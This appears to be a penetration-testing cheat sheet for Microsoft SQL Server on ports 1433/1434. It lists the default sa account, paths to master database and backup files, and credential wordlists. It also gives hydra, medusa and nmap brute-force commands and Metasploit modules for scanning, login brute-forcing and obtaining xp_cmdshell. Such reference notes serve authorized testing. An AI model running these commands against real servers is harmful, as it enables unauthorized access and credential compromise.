TCP 1433, UDP 1434: MSSQL Server
Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network.
-- Wikipedia
Related
General
Default admin account: sa
Interesting paths (example: Microsoft SQL Server 2017 14.00.1000.00)
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\DATA\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup\master.mdf
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup\master.bak
Brute force login
Wordlists
/usr/share/seclists/Passwords/Default-Credentials/mssql-betterdefaultpasslist.txt
/usr/share/seclists/Usernames/mssql-usernames-nansh0u-guardicore.txt
/usr/share/seclists/Passwords/mssql-passwords-nansh0u-guardicore.txt
Tools
hydra -L <users-file> -P <pw-file> <ip> mssql -vV
medusa -U <users-file> -P <pw-file> -M mssql -h <ip>
nmap -p 1433 --script=ms-sql-brute.nse --script-args userdb<users-file,passdb=<pw-file> <ip>
Metasploit
Find MSSQL instances
auxiliary/scanner/mssql/mssql_ping
Brute force login
scanner/mssql/mssql_login
Obtain a xp_cmdshell
using
windows/mssql/mssql_payload
Last updated